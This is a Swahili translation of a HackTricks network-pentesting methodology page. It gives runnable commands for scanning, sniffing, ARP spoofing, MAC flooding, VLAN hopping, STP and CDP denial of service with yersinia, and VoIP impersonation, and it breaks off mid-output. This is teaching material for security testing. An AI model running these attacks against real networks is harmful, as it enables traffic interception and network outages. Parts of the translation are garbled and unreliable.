hacktricks/generic-methodologies-and-resources/pentesting-network
2024-05-05 22:47:30 +00:00
..
dhcpv6.md Translated to Swahili 2024-02-11 02:13:58 +00:00
eigrp-attacks.md Translated to Swahili 2024-02-11 02:13:58 +00:00
glbp-and-hsrp-attacks.md Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-05-02 15:14:31 +00:00
ids-evasion.md Translated to Swahili 2024-02-11 02:13:58 +00:00
lateral-vlan-segmentation-bypass.md Translated to Swahili 2024-02-11 02:13:58 +00:00
network-protocols-explained-esp.md Translated to Swahili 2024-02-11 02:13:58 +00:00
nmap-summary-esp.md Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-05-02 15:14:31 +00:00
pentesting-ipv6.md Translated to Swahili 2024-02-11 02:13:58 +00:00
README.md Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00
spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md Translated to Swahili 2024-02-11 02:13:58 +00:00
spoofing-ssdp-and-upnp-devices.md Translated to Swahili 2024-02-11 02:13:58 +00:00

Kupima Mtandao

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:


Sawa ya tuzo ya mdudu: jiandikishe kwa Intigriti, jukwaa la tuzo za mdudu la malipo lililoundwa na wakora kwa wakora! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata tuzo hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Kugundua wenyeji kutoka nje

Hii itakuwa sehemu fupi kuhusu jinsi ya kupata IPs zinazojibu kutoka kwa Intaneti.
Katika hali hii una wigo wa IPs (labda hata aina kadhaa) na unahitaji tu kugundua IPs zipi zinajibu.

ICMP

Hii ni njia rahisi na haraka ya kugundua ikiwa mwenyeji yuko juu au la.
Unaweza kujaribu kutuma baadhi ya pakiti za ICMP na kutarajia majibu. Njia rahisi ni kutuma ombi la kipeperushi na kutarajia majibu. Unaweza kufanya hivyo kwa kutumia ping rahisi au kutumia fping kwa aina.
Unaweza pia kutumia nmap kutuma aina zingine za pakiti za ICMP (hii itazuia vichujio kwa ombi la kipeperushi la ICMP la kawaida).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

Ugunduzi wa Bandari ya TCP

Ni kawaida sana kukuta kuwa aina zote za pakiti za ICMP zinafungwa. Kisha, yote unayoweza kufanya ni kuangalia kama mwenyeji yupo ni jaribu kupata bandari zilizofunguliwa. Kila mwenyeji ana bandari 65535, hivyo, ikiwa una "eneo kubwa" huwezi kujaribu kama kila bandari ya kila mwenyeji imefunguliwa au la, hilo litachukua muda mwingi sana.
Kwa hivyo, unachohitaji ni skana ya bandari haraka (masscan) na orodha ya bandari zinazotumiwa zaidi:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

Ugunduzi wa Bandari ya HTTP

Hii ni tu ugunduzi wa bandari ya TCP wenye manufaa unapotaka kuzingatia ugunduzi wa huduma za HTTP:

masscan -p80,443,8000-8100,8443 199.66.11.0/24

Ugunduzi wa Bandari ya UDP

Unaweza pia jaribu kuangalia ikiwa kuna bandari ya UDP wazi ili kuamua ikiwa unapaswa kutilia maanani zaidi mwenyeji. Kwa kuwa huduma za UDP kawaida hazijibu na data yoyote kwa pakiti ya uchunguzi wa UDP tupu kawaida ni ngumu kusema ikiwa bandari inafanyiwa uchujaji au iko wazi. Njia rahisi ya kuamua hii ni kutuma pakiti inayohusiana na huduma inayoendeshwa, na kwa kuwa hujui huduma ipi inayoendeshwa, unapaswa kujaribu ile inayoweza kutokea zaidi kulingana na nambari ya bandari:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

Mstari wa nmap uliopendekezwa hapo awali utajaribu bandari za UDP za juu 1000 kwenye kila mwenyeji ndani ya safu ya /24 lakini hata hii itachukua >20min. Ikiwa unahitaji matokeo haraka unaweza kutumia udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 Hii itatuma probes za UDP hizi kwenye bandari zinazotarajiwa (kwa safu ya /24 hii itachukua dakika 1 tu): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

Ugunduzi wa Bandari za SCTP

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Kupima Usalama wa Wifi

Hapa unaweza kupata mwongozo mzuri wa mashambulizi ya Wifi yaliyojulikana wakati wa uandishi:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Kugundua wenyeji kutoka ndani

Ikiwa uko ndani ya mtandao moja ya mambo ya kwanza utakayotaka kufanya ni kugundua wenyeji wengine. Kulingana na kelele ngapi unaweza/unataka kufanya, hatua tofauti zinaweza kutekelezwa:

Kusikiliza

Unaweza kutumia zana hizi kugundua wenyeji kwa upande wa mtandao uliounganishwa:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Kazi

Tafadhali elewa kwamba mbinu zilizoelezwa katika Kugundua wenyeji kutoka nje (Ugunduzi wa Bandari za TCP/HTTP/UDP/SCTP) zinaweza pia kutumika hapa.
Lakini, kwa kuwa uko kwenye mtandao sawa na wenyeji wengine, unaweza kufanya vitendo zaidi:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

ICMP ya Kazi

Tafadhali kumbuka kuwa mbinu zilizoelezwa katika Kugundua mwenyeji kutoka nje (ICMP) zinaweza kutumika hapa pia.
Lakini, kwa kuwa uko kwenye mtandao sawa na wengine, unaweza kufanya vitendo zaidi:

  • Ikiwa unafanya ping kwa anwani ya utangazaji wa subnet ping inapaswa kuwasilishwa kwa kila mwenyeji na wanaweza kujibu kwako: ping -b 10.10.5.255
  • Kupiga anwani ya utangazaji wa mtandao unaweza hata kupata mwenyeji ndani ya subnet nyingine: ping -b 255.255.255.255
  • Tumia bendera za -PE, -PP, -PM za nmap kufanya ugunduzi wa mwenyeji kwa kutuma maombi ya ICMPv4 echo, timestamp, na ombi la subnet mask: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Kuamsha Kwenye Mtandao (Wake On Lan)

Kuamsha kwenye Mtandao hutumika kwa kuwasha kompyuta kupitia ujumbe wa mtandao. Pakiti ya uchawi inayotumiwa kuwasha kompyuta ni pakiti ambapo MAC Dst inatolewa na kisha inarudia mara 16 ndani ya pakiti hiyo hiyo.
Kisha aina hii ya pakiti kawaida hutumwa katika ethernet 0x0842 au katika pakiti ya UDP kwa bandari 9.
Ikiwa hakuna [MAC] inayotolewa, pakiti hiyo hutumwa kwa ethernet ya utangazaji (na MAC ya utangazaji itarudiwa).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Kuchunguza Wenyeji

Baada ya kugundua IPs zote (za nje au za ndani) unazotaka kuchunguza kwa undani, hatua tofauti zinaweza kutekelezwa.

TCP

  • Bandari iliyofunguliwa: SYN --> SYN/ACK --> RST
  • Bandari iliyofungwa: SYN --> RST/ACK
  • Bandari iliyofungwa: SYN --> [HAKUNA MAJIBU]
  • Bandari iliyofungwa: SYN --> ujumbe wa ICMP
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

Kuna chaguo 2 za kutambaza bandari ya UDP:

  • Tuma pakiti ya UDP na angalia majibu ya ICMP isiyopatikana ikiwa bandari imefungwa (katika visa kadhaa ICMP itakuwa imezuiwa hivyo hutapokea habari yoyote ikiwa bandari imefungwa au imefunguliwa).
  • Tuma datagrams iliyoundwa kusababisha majibu kutoka kwa huduma (k.m., DNS, DHCP, TFTP, na nyinginezo, kama ilivyoorodheshwa katika nmap-payloads). Ikiwa unapokea majibu, basi, bandari iko wazi.

Nmap itachanganya chaguo zote mbili kwa kutumia "-sV" (Uchunguzi wa UDP ni wa polepole sana), lakini kumbuka kuwa uchunguzi wa UDP ni polepole kuliko uchunguzi wa TCP:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

Uchunguzi wa SCTP

SCTP (Itifaki ya Udhibiti wa Mawasiliano ya Mtiririko) imeundwa kutumiwa pamoja na TCP (Itifaki ya Udhibiti wa Uhamishaji) na UDP (Itifaki ya Ujumbe wa Mtumiaji). Lengo kuu ni kurahisisha usafirishaji wa data za simu juu ya mitandao ya IP, ikilinganisha na sifa nyingi za uaminifu zilizopatikana katika Mfumo wa Ishara 7 (SS7). SCTP ni sehemu kuu ya familia ya itifaki ya SIGTRAN, ambayo lengo lake ni kusafirisha ishara za SS7 juu ya mitandao ya IP.

Msaada wa SCTP unatolewa na mifumo mbalimbali ya uendeshaji, kama vile IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, na VxWorks, ikionyesha kukubalika kwa pana na matumizi yake katika uga wa mawasiliano ya simu na mitandao.

Nmap inatoa uchunguzi wa SCTP kwa njia mbili tofauti: -sY na -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

Kuepuka IDS na IPS

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

Chaguo zaidi za nmap

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

Kufichua Anwani za IP za Ndani

Routers zilizowekwa vibaya, firewalls, na vifaa vya mtandao mara nyingine hujibu sondi za mtandao kwa kutumia anwani za chanzo zisizokuwa za umma. tcpdump inaweza kutumika kutambua pakiti zinazopokelewa kutoka kwa anwani za kibinafsi wakati wa majaribio. Hasa, kwenye Kali Linux, pakiti zinaweza kukamatwa kwenye kiolesura cha eth2, ambacho kinapatikana kutoka kwenye Mtandao wa Umma. Ni muhimu kutambua kwamba ikiwa usanidi wako uko nyuma ya NAT au Firewall, pakiti kama hizo zinaweza kufutwa.

tcpdump nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Kunasa

Kunasa unaweza kujifunza maelezo ya safu za IP, saizi za subnet, anwani za MAC, na majina ya mwenyeji kwa kupitia mapicha na pakiti zilizonaswa. Ikiwa mtandao umekosewa mipangilio au kitambaa cha kubadilisha kina msongo, wachomaji wanaweza kukamata vifaa nyeti kupitia kunasa kwa mtandao kwa njia ya kupita.

Ikiwa mtandao wa Ethernet uliobadilishwa umepangwa vizuri, utaona tu mapicha ya matangazo na vifaa vilivyolengwa kwa anwani yako ya MAC.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Mtu anaweza, pia, kukamata pakiti kutoka kwa mashine ya mbali kupitia kikao cha SSH na Wireshark kama GUI katika wakati halisi.

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Bila shaka.

Kukamata siri

Unaweza kutumia zana kama https://github.com/lgandx/PCredz kuchambua siri kutoka kwa pcap au interface ya moja kwa moja.

Mashambulizi ya LAN

Kudanganya ARP

Kudanganya ARP inajumuisha kutuma ARPResponses za bure kuonyesha kwamba IP ya kifaa ina MAC ya kifaa chetu. Kisha, muathiriwa atabadilisha jedwali la ARP na kuwasiliana na kifaa chetu kila wakati anapotaka kuwasiliana na IP iliyodanganywa.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

Kufurika kwa MAC - kujaa kwa CAM

Kufurika kwa meza ya CAM ya swichi kwa kutuma pakiti nyingi zenye anwani tofauti za MAC chanzo. Wakati meza ya CAM inapojaa, swichi huanza kutenda kama kiunganishi (kutangaza trafiki yote).

macof -i <interface>

Katika swichi za kisasa, udhaifu huu umetatuliwa.

Mashambulizi ya 802.1Q VLAN / DTP

Trunking ya Kudumu

Itifaki ya Trunking ya Kudumu (DTP) imeundwa kama itifaki ya safu ya kiungo kufanikisha mfumo wa moja kwa moja kwa ajili ya trunking, kuruhusu swichi kuchagua bandari kiotomatiki kwa ajili ya hali ya trunk (Trunk) au hali isiyo ya trunk. Utumiaji wa DTP mara nyingi huchukuliwa kama ishara ya muundo duni wa mtandao, ukisisitiza umuhimu wa kuweka mizani ya mikato kwa mkono tu pale inapohitajika na kuhakikisha nyaraka sahihi.

Kwa chaguo-msingi, bandari za swichi huzinduliwa kufanya kazi katika hali ya Kiotomatiki ya Kudumu, maana yake ziko tayari kuanzisha trunking ikiombwa na swichi jirani. Wasiwasi wa usalama unatokea wakati pentester au mkaidi anapojiunganisha kwenye swichi na kutuma fremu ya DTP ya Kuvutia, kuilazimisha bandari kuingia hali ya trunk. Hatua hii inamruhusu mkaidi kuhesabu VLAN kupitia uchambuzi wa fremu za STP na kuzunguka upekee wa VLAN kwa kuweka vipakuzi vya vituo vya kawaida.

Kuwepo kwa DTP katika swichi nyingi kwa chaguo-msingi kunaweza kutumiwa na maadui kujifanya kama tabia ya swichi, hivyo kupata ufikivu wa trafiki kote kwenye VLAN. Skripti dtpscan.sh hutumiwa kufuatilia kiolesura, kufunua ikiwa swichi iko katika hali ya Chaguo-msingi, Trunk, Kudumu, Kiotomatiki, au Kufikia—ya mwisho ikiwa mpangilio pekee usioathiriwa na mashambulizi ya kuvuka VLAN. Zana hii huchunguza hali ya udhaifu wa swichi.

Kama udhaifu wa mtandao unagunduliwa, zana ya Yersinia inaweza kutumika "kuwezesha trunking" kupitia itifaki ya DTP, kuruhusu uangalizi wa pakiti kutoka kwenye VLAN zote.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

Kutambua VLANs pia niwezekanavyo kwa kuzalisha fremu ya DTP Desirable kwa kutumia script DTPHijacking.py. Usikatize script kwa hali yoyote. Injekta DTP Desirable kila baada ya sekunde tatu. Vipindi vya mizizi vilivyoundwa kwa kudumu kwenye swichi huishi kwa dakika tano. Baada ya dakika tano, mizizi inaondoka.

sudo python3 DTPHijacking.py --interface eth0

Ningependa kueleza kwamba Access/Desirable (0x03) inaonyesha kwamba fremu ya DTP ni aina ya Desirable, ambayo inaambia bandari kubadilisha na hali ya Trunk. Na 802.1Q/802.1Q (0xa5) inaonyesha aina ya kufunika 802.1Q.

Kwa kuchambua fremu za STP, tunajifunza kuhusu uwepo wa VLAN 30 na VLAN 60.

Kuvamia VLAN maalum

Maratibu unapojua Vitambulisho vya VLAN na thamani za IP, unaweza configure kiolesura bandia kuvamia VLAN maalum.
Ikiwa DHCP haipatikani, basi tumia ifconfig kuweka anwani ya IP ya tuli.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Mvamizi wa VLAN wa Kiotomatiki

Shambulio lililozungumziwa la Dynamic Trunking na kuunda interface za kivitual na kugundua mwenyeji ndani ya VLAN nyingine hutekelezwa kiotomatiki na zana: https://github.com/nccgroup/vlan-hopping---frogger

Kuziba Mara Mbili (Double Tagging)

Ikiwa mvamizi anajua thamani ya MAC, IP na Kitambulisho cha VLAN cha mwenyeji wa kikwete, anaweza kujaribu kuziba fremu mara mbili na VLAN yake iliyoteuliwa na VLAN ya mwenyeji na kutuma pakiti. Kwa kuwa mwenyeji hataweza kuunganisha tena na mvamizi, hivyo chaguo bora kwa mvamizi ni kuwasiliana kupitia UDP kwa itifaki ambazo zinaweza kutekeleza baadhi ya hatua za kuvutia (kama vile SNMP).

Chaguo lingine kwa mvamizi ni kuzindua uchunguzi wa bandari ya TCP ukiiga anwani ya IP iliyoongozwa na mvamizi na inayoweza kufikiwa na mwenyeji (labda kupitia mtandao). Kisha, mvamizi anaweza kunusa kwenye mwenyeji wa pili aliye naye ikiwa inapokea baadhi ya pakiti kutoka kwa mwenyeji.

Kutekeleza shambulio hili unaweza kutumia scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Kukwepa Ubaguzi wa Segmentation wa VLAN wa Kando

Ikiwa una upatikanaji wa swichi ambayo unaunganishwa moja kwa moja nayo, una uwezo wa kukwepa ubaguzi wa VLAN ndani ya mtandao. Tu badilisha bandari kuwa hali ya mizizi (inayojulikana pia kama mizizi), tengeneza vipengele vya kubadilika na vitambulisho vya VLAN za lengo, na sanidi anwani ya IP. Unaweza jaribu kuomba anwani hiyo kwa njia ya kudumu (DHCP) au unaweza kuipangilia kwa njia ya tuli. Inategemea na hali.

{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}

Kukwepa VLAN Binafsi ya Tabaka la 3

Katika mazingira fulani, kama vile mitandao ya wireless ya wageni, mipangilio ya kutengwa kwa bandari (inayojulikana pia kama VLAN binafsi) imeanzishwa ili kuzuia wateja waliounganishwa kwenye kipengele cha upatikanaji wa wireless wasiongea moja kwa moja na wengine. Hata hivyo, mbinu imegunduliwa inayoweza kuzunguka hatua hizi za kutengwa. Mbinu hii inatumia upungufu wa ACL za mtandao au usanidi usio sahihi, kuruhusu pakiti za IP kuelekezwa kupitia router kufikia mteja mwingine kwenye mtandao huo.

Shambulio hutekelezwa kwa kujenga pakiti inayobeba anwani ya IP ya mteja wa marudio lakini na anwani ya MAC ya router. Hii husababisha router kutuma kimakosa pakiti kwa mteja wa lengo. Mbinu hii inafanana na ile inayotumiwa katika Mashambulio ya Double Tagging, ambapo uwezo wa kudhibiti mwenyeji unaopatikana kwa muhanga hutumiwa kudhoofisha kasoro ya usalama.

Hatua muhimu za Shambulio:

  1. Kutengeneza Pakiti: Pakiti hutengenezwa kwa umakini kujumuisha anwani ya IP ya mteja wa lengo lakini na anwani ya MAC ya router.
  2. Kutumia Tabia ya Router: Pakiti iliyotengenezwa hutumwa kwa router, ambayo, kutokana na usanidi, inaelekeza pakiti kwa mteja wa lengo, ikikwepa kutengwa kwa VLAN binafsi.

Mashambulio ya VTP

VTP (Itifaki ya Mzizi wa VLAN) inasimamia VLAN kwa njia ya kati. Inatumia nambari za marekebisho kudumisha uadilifu wa hifadhidata ya VLAN; mabadiliko yoyote huongeza nambari hii. Swichi huchukua usanidi wenye nambari za marekebisho ya juu, zikisasisha hifadhidata zao za VLAN.

Majukumu ya Kikoa cha VTP

  • Mzizi wa VTP: Inasimamia VLAN—inaunda, inafuta, inabadilisha. Inatangaza matangazo ya VTP kwa wanachama wa kikoa.
  • Mteja wa VTP: Hupokea matangazo ya VTP ili kusawazisha hifadhidata yake ya VLAN. Jukumu hili linazuiliwa kutoka kwa mabadiliko ya usanidi wa VLAN wa ndani.
  • Mzushi wa VTP: Hahusiki na sasisho za VTP lakini hutoa matangazo ya VTP. Hauathiriwi na mashambulio ya VTP, unadumisha nambari ya marekebisho ya mara kwa mara ya sifuri.

Aina za Matangazo ya VTP

  • Matangazo ya Muhtasari: Yaliyotangazwa na mzizi wa VTP kila baada ya sekunde 300, yakibeba habari muhimu ya kikoa.
  • Matangazo ya Sehemu: Hutumwa baada ya mabadiliko ya usanidi wa VLAN.
  • Ombi la Matangazo: Hutolewa na mteja wa VTP kuomba Matangazo ya Muhtasari, kawaida kujibu kugundua nambari ya marekebisho ya usanidi wa juu.

Mashambulio ya VTP yanaweza kudhoofishwa kipekee kupitia bandari za mizizi kwani matangazo ya VTP yanazunguka kupitia bandari hizo pekee. Baada ya mazingira ya mashambulio ya DTP yanaweza kuelekezwa kuelekea VTP. Zana kama Yersinia inaweza kurahisisha mashambulio ya VTP, lengo likiwa kufuta hifadhidata ya VLAN, kusababisha kuvurugika kwa mtandao.

Kumbuka: Mjadala huu unahusiana na VTP toleo 1 (VTPv1).

%% yersinia -G # Launch Yersinia in graphical mode ```

Mashambulizi ya STP

Ikiwa huwezi kukamata fremu za BPDU kwenye viunganishi vyako, ni nadra utafanikiwa katika shambulio la STP.

STP BPDU DoS

Kwa kutuma BPDUs nyingi za TCP (Taarifa ya Mabadiliko ya Topolojia) au Conf (BPDUs zinazotumwa wakati topolojia inajengwa) swichi zinazidiwa na kusitisha kufanya kazi kwa usahihi.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

Mshambulizi wa STP TCP

Wakati TCP inapotumwa, jedwali la CAM la mitambo litafutwa ndani ya sekunde 15. Kisha, ikiwa unatuma pakiti za aina hii kwa mfululizo, jedwali la CAM litarejeshwa kwa mfululizo (au kila sekunde 15) na wakati linapojirejesha, swichi inajitokeza kama kiunganishi cha mtandao.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

Mzizi wa Shambulio la STP

Mshambuliaji anajifanya kuwa kama swichi ili kuwa mzizi wa STP wa mtandao. Kisha, data zaidi itapita kupitia kwake. Hii ni ya kuvutia unapokuwa umehusishwa na swichi mbili tofauti.
Hii hufanywa kwa kutuma pakiti za BPDUs za CONF zikisema kuwa thamani ya kipaumbele (priority) ni ndogo kuliko kipaumbele halisi cha swichi ya mzizi halisi.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Ikiwa mshambuliaji ameunganishwa na swichi 2 anaweza kuwa mzizi wa mti mpya na trafiki yote kati ya hizo swichi itapita kupitia kwake (shambulio la MITM litatekelezwa).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

Mashambulizi ya CDP

Itifaki ya Ugunduzi wa CISCO (CDP) ni muhimu kwa mawasiliano kati ya vifaa vya CISCO, ikiruhusu kutambua kila mmoja na kushiriki maelezo ya usanidi.

Ukusanyaji wa Data wa Kipokezi

CDP imeboreshwa kutangaza habari kupitia bandari zote, ambayo inaweza kusababisha hatari ya usalama. Mshambuliaji, baada ya kuunganisha kwenye bandari ya swichi, anaweza kutumia zana za kuvizia mtandao kama Wireshark, tcpdump, au Yersinia. Hatua hii inaweza kufunua data nyeti kuhusu kifaa cha mtandao, ikiwa ni pamoja na mfano wake na toleo la Cisco IOS inayotumika. Mshambuliaji anaweza kisha kulenga mapungufu maalum katika toleo lililotambuliwa la Cisco IOS.

Kuchochea Kujaa kwa Jedwali la CDP

Njia inayohusisha zaidi ni kuanzisha mashambulizi ya Kukataa Huduma (DoS) kwa kuzidi kumbukumbu ya swichi, kujifanya kuwa vifaa halali vya CISCO. Hapa chini ni mfuatano wa amri kwa kuanzisha mashambulizi kama hayo kwa kutumia Yersinia, zana ya mtandao iliyoundwa kwa ajili ya majaribio:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Wakati wa shambulio hili, CPU ya switch na meza ya majirani ya CDP zinachukuliwa sana, ikisababisha kile kinachoitwa mara nyingi kama "kuzimwa kwa mtandao" kutokana na matumizi mabaya ya rasilimali.

Shambulio la Udanganyifu wa CDP

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Unaweza pia kutumia scapy. Hakikisha kusakinisha na pakiti ya scapy/contrib.

Mashambulizi ya VoIP na Zana ya VoIP Hopper

Simu za VoIP, zinazounganishwa mara nyingi na vifaa vya IoT, hutoa utendaji kama kufungua milango au kudhibiti termostati kupitia nambari maalum za simu. Hata hivyo, uingizaji huu unaweza kuleta hatari za usalama.

Zana ya voiphopper imeundwa kwa lengo la kujifanya kuwa simu ya VoIP katika mazingira tofauti (Cisco, Avaya, Nortel, Alcatel-Lucent). Inagundua kitambulisho cha VLAN cha mtandao wa sauti kwa kutumia itifaki kama CDP, DHCP, LLDP-MED, na 802.1Q ARP.

VoIP Hopper inatoa njia tatu kwa itifaki ya Ugunduzi wa Cisco (CDP):

  1. Njia ya Kuchunguza (-c 0): Inachambua pakiti za mtandao kutambua kitambulisho cha VLAN.
  2. Njia ya Kudanganya (-c 1): Inazalisha pakiti za desturi zinazofanana na zile za kifaa halisi cha VoIP.
  3. Njia ya Kudanganya na Pakiti Iliyotengenezwa Mapema (-c 2): Inatuma pakiti zinazofanana na zile za mfano maalum wa simu ya IP ya Cisco.

Njia inayopendelewa kwa kasi ni ile ya tatu. Inahitaji kufafanua:

  • Kiolesura cha mtandao cha muhusika (-i parameter).
  • Jina la kifaa cha VoIP kinachojifanya (-E parameter), kufuata muundo wa kutaja wa Cisco (k.m., SEP ikifuatiwa na anwani ya MAC).

Katika mazingira ya kampuni, ili kujifanya kuwa kifaa cha VoIP kilichopo, mtu anaweza:

  • Kuchunguza lebo ya MAC kwenye simu.
  • Kupitia mipangilio ya kuonyesha ya simu ili kuona habari ya mfano.
  • Kuunganisha kifaa cha VoIP kwenye kompyuta kibao na kuchunguza maombi ya CDP kwa kutumia Wireshark.

Amri ya mfano ya kutekeleza zana katika njia ya tatu ingekuwa:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

Mipangilio ya DHCP

Uthibitishaji

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
